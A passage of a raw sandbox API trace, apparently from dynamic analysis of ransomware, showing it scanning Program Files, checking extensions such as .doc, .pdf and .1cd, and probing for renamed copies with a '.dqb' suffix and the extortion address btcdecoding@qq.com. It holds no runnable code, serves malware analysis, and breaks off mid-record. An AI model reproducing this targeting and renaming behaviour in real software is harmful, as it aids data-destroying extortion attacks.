lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0269.366] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0269.366] lstrlenW (lpString=".zip") returned 4 [0269.366] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0269.366] lstrlenW (lpString=".rar") returned 4 [0269.366] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0269.366] lstrlenW (lpString=".bz2") returned 4 [0269.366] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0269.366] lstrlenW (lpString=".7z") returned 3 [0269.366] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0269.366] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0269.366] lstrlenW (lpString=".dbf") returned 4 [0269.366] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0269.366] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0269.366] lstrlenW (lpString=".1cd") returned 4 [0269.366] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0269.366] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0269.366] lstrlenW (lpString=".jpg") returned 4 [0269.366] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0269.367] lstrcmpiW (lpString1=".avi", lpString2=".dqb") returned -1 [0269.367] lstrlenW (lpString="boxed-delete.avi") returned 16 [0269.367] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0269.436] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x2fcff1c | out: lpFileSize=0x2fcff1c*=31744) returned 1 [0269.436] CloseHandle (hObject=0x1f4) returned 1 [0269.436] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi")) returned 0x20 [0269.436] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0269.436] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0269.436] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0269.436] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0269.436] lstrlenW (lpString=".doc") returned 4 [0269.436] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0269.436] lstrlenW (lpString=".docx") returned 5 [0269.436] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0269.436] lstrlenW (lpString=".pdf") returned 4 [0269.436] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0269.436] lstrlenW (lpString=".xls") returned 4 [0269.436] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0269.436] lstrlenW (lpString=".xlsx") returned 5 [0269.436] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0269.436] lstrlenW (lpString=".ppt") returned 4 [0269.436] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0269.436] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0269.436] lstrlenW (lpString=".zip") returned 4 [0269.436] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0269.436] lstrlenW (lpString=".rar") returned 4 [0269.436] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0269.436] lstrlenW (lpString=".bz2") returned 4 [0269.436] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0269.436] lstrlenW (lpString=".7z") returned 3 [0269.436] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0269.437] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0269.437] lstrlenW (lpString=".dbf") returned 4 [0269.437] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0269.437] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0269.437] lstrlenW (lpString=".1cd") returned 4 [0269.437] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0269.437] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0269.437] lstrlenW (lpString=".jpg") returned 4 [0269.437] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0269.437] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0269.437] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0269.437] lstrlenW (lpString=".doc") returned 4 [0269.437] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0269.437] lstrlenW (lpString=".docx") returned 5 [0269.437] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0269.437] lstrlenW (lpString=".pdf") returned 4 [0269.437] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0269.437] lstrlenW (lpString=".xls") returned 4 [0269.437] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0269.437] lstrlenW (lpString=".xlsx") returned 5 [0269.437] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0269.437] lstrlenW (lpString=".ppt") returned 4 [0269.437] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0269.437] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0269.437] lstrlenW (lpString=".zip") returned 4 [0269.437] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0269.437] lstrlenW (lpString=".rar") returned 4 [0269.437] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0269.437] lstrlenW (lpString=".bz2") returned 4 [0269.437] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0269.437] lstrlenW (lpString=".7z") returned 3 [0269.437] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0269.437] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0269.437] lstrlenW (lpString=".dbf") returned 4 [0269.438] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0269.438] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0269.438] lstrlenW (lpString=".1cd") returned 4 [0269.438] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0269.438] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0269.438] lstrlenW (lpString=".jpg") returned 4 [0269.438] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0269.438] Sleep (dwMilliseconds=0x64) [0269.828] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0269.828] lstrlenW (lpString="base_altgr.xml") returned 14 [0269.828] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0270.239] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x2fcff1c | out: lpFileSize=0x2fcff1c*=3161) returned 1 [0270.239] CloseHandle (hObject=0x1f4) returned 1 [0270.239] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml")) returned 0x20 [0270.239] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0270.239] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0270.239] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0270.239] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0270.239] lstrlenW (lpString=".doc") returned 4 [0270.239] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0270.239] lstrlenW (lpString=".docx") returned 5 [0270.239] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0270.239] lstrlenW (lpString=".pdf") returned 4 [0270.239] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0270.239] lstrlenW (lpString=".xls") returned 4 [0270.239] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0270.239] lstrlenW (lpString=".xlsx") returned 5 [0270.239] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0270.239] lstrlenW (lpString=".ppt") returned 4 [0270.239] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0270.240] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0270.240] lstrlenW (lpString=".zip") returned 4 [0270.240] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0270.240] lstrlenW (lpString=".rar") returned 4 [0270.240] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0270.240] lstrlenW (lpString=".bz2") returned 4 [0270.240] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0270.240] lstrlenW (lpString=".7z") returned 3 [0270.240] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0270.240] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0270.240] lstrlenW (lpString=".dbf") returned 4 [0270.240] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0270.240] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0270.240] lstrlenW (lpString=".1cd") returned 4 [0270.240] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0270.240] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0270.240] lstrlenW (lpString=".jpg") returned 4 [0270.240] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0270.240] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0270.240] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0270.240] lstrlenW (lpString=".doc") returned 4 [0270.240] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0270.240] lstrlenW (lpString=".docx") returned 5 [0270.240] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0270.240] lstrlenW (lpString=".pdf") returned 4 [0270.240] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0270.240] lstrlenW (lpString=".xls") returned 4 [0270.240] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0270.240] lstrlenW (lpString=".xlsx") returned 5 [0270.240] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0270.240] lstrlenW (lpString=".ppt") returned 4 [0270.240] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0270.240] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0270.241] lstrlenW (lpString=".zip") returned 4 [0270.241] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0270.241] lstrlenW (lpString=".rar") returned 4 [0270.241] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0270.241] lstrlenW (lpString=".bz2") returned 4 [0270.241] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0270.241] lstrlenW (lpString=".7z") returned 3 [0270.241] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0270.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0270.241] lstrlenW (lpString=".dbf") returned 4 [0270.241] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0270.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0270.241] lstrlenW (lpString=".1cd") returned 4 [0270.241] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0270.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0270.241] lstrlenW (lpString=".jpg") returned 4 [0270.241] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0270.241] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0270.241] lstrlenW (lpString="base_heb.xml") returned 12 [0270.241] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0270.491] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x2fcff1c | out: lpFileSize=0x2fcff1c*=738) returned 1 [0270.491] CloseHandle (hObject=0x318) returned 1 [0270.491] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml")) returned 0x20 [0270.491] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0270.491] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0270.491] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0270.491] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0270.491] lstrlenW (lpString=".doc") returned 4 [0270.491] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0270.491] lstrlenW (lpString=".docx") returned 5 [0270.491] lstrcmpiW (lpString1=".docx", lpString2="b.xml") returned -1 [0270.491] lstrlenW (lpString=".pdf") returned 4 [0270.491] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0270.491] lstrlenW (lpString=".xls") returned 4 [0270.491] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0270.491] lstrlenW (lpString=".xlsx") returned 5 [0270.491] lstrcmpiW (lpString1=".xlsx", lpString2="b.xml") returned -1 [0270.491] lstrlenW (lpString=".ppt") returned 4 [0270.491] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0270.492] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0270.492] lstrlenW (lpString=".zip") returned 4 [0270.492] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0270.492] lstrlenW (lpString=".rar") returned 4 [0270.492] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0270.492] lstrlenW (lpString=".bz2") returned 4 [0270.492] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0270.492] lstrlenW (lpString=".7z") returned 3 [0270.492] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0270.492] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0270.492] lstrlenW (lpString=".dbf") returned 4 [0270.492] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0270.492] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0270.492] lstrlenW (lpString=".1cd") returned 4 [0270.492] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0270.492] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0270.492] lstrlenW (lpString=".jpg") returned 4 [0270.492] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0270.492] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0270.492] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0270.492] lstrlenW (lpString=".doc") returned 4 [0270.492] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0270.492] lstrlenW (lpString=".docx") returned 5 [0270.492] lstrcmpiW (lpString1=".docx", lpString2="b.xml") returned -1 [0270.492] lstrlenW (lpString=".pdf") returned 4 [0270.492] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0270.492] lstrlenW (lpString=".xls") returned 4 [0270.492] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0270.492] lstrlenW (lpString=".xlsx") returned 5 [0270.492] lstrcmpiW (lpString1=".xlsx", lpString2="b.xml") returned -1 [0270.492] lstrlenW (lpString=".ppt") returned 4 [0270.492] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0270.492] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0270.493] lstrlenW (lpString=".zip") returned 4 [0270.493] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0270.493] lstrlenW (lpString=".rar") returned 4 [0270.493] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0270.493] lstrlenW (lpString=".bz2") returned 4 [0270.493] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0270.493] lstrlenW (lpString=".7z") returned 3 [0270.493] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0270.493] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0270.493] lstrlenW (lpString=".dbf") returned 4 [0270.493] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0270.493] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0270.493] lstrlenW (lpString=".1cd") returned 4 [0270.493] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0270.493] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0270.493] lstrlenW (lpString=".jpg") returned 4 [0270.493] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0270.493] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0270.493] lstrlenW (lpString="oskmenubase.xml") returned 15 [0270.493] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0271.052] GetFileSizeEx (in: hFile=0x1e8, lpFileSize=0x2fcff1c | out: lpFileSize=0x2fcff1c*=471) returned 1 [0271.052] CloseHandle (hObject=0x1e8) returned 1 [0271.052] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml")) returned 0x20 [0271.052] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0271.052] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0271.052] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 88 [0271.052] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 88 [0271.052] lstrlenW (lpString=".doc") returned 4 [0271.052] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0271.052] lstrlenW (lpString=".docx") returned 5 [0271.052] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0271.052] lstrlenW (lpString=".pdf") returned 4 [0271.052] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0271.052] lstrlenW (lpString=".xls") returned 4 [0271.052] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0271.052] lstrlenW (lpString=".xlsx") returned 5 [0271.052] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0271.052] lstrlenW (lpString=".ppt") returned 4 [0271.052] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0271.053] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 88 [0271.053] lstrlenW (lpString=".zip") returned 4 [0271.053] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0271.053] lstrlenW (lpString=".rar") returned 4 [0271.053] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0271.053] lstrlenW (lpString=".bz2") returned 4 [0271.053] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0271.053] lstrlenW (lpString=".7z") returned 3 [0271.053] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0271.053] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 88 [0271.053] lstrlenW (lpString=".dbf") returned 4 [0271.053] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0271.053] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 88 [0271.053] lstrlenW (lpString=".1cd") returned 4 [0271.053] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0271.053] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 88 [0271.053] lstrlenW (lpString=".jpg") returned 4 [0271.053] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0271.053] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 88 [0271.053] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 88 [0271.053] lstrlenW (lpString=".doc") returned 4 [0271.053] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0271.053] lstrlenW (lpString=".docx") returned 5 [0271.053] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0271.053] lstrlenW (lpString=".pdf") returned 4 [0271.053] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0271.053] lstrlenW (lpString=".xls") returned 4 [0271.053] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0271.053] lstrlenW (lpString=".xlsx") returned 5 [0271.053] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0271.053] lstrlenW (lpString=".ppt") returned 4 [0271.053] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0271.053] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 88 [0271.054] lstrlenW (lpString=".zip") returned 4 [0271.054] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0271.054] lstrlenW (lpString=".rar") returned 4 [0271.054] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0271.054] lstrlenW (lpString=".bz2") returned 4 [0271.054] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0271.054] lstrlenW (lpString=".7z") returned 3 [0271.054] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0271.054] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 88 [0271.054] lstrlenW (lpString=".dbf") returned 4 [0271.054] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0271.054] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 88 [0271.054] lstrlenW (lpString=".1cd") returned 4 [0271.054] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0271.054] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 88 [0271.054] lstrlenW (lpString=".jpg") returned 4 [0271.054] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0271.054] Sleep (dwMilliseconds=0x64) [0271.382] lstrcmpiW (lpString1=".wmv", lpString2=".dqb") returned 1 [0271.382] lstrlenW (lpString="BabyBoyNotesBackground_PAL.wmv") returned 30 [0271.382] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboynotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, 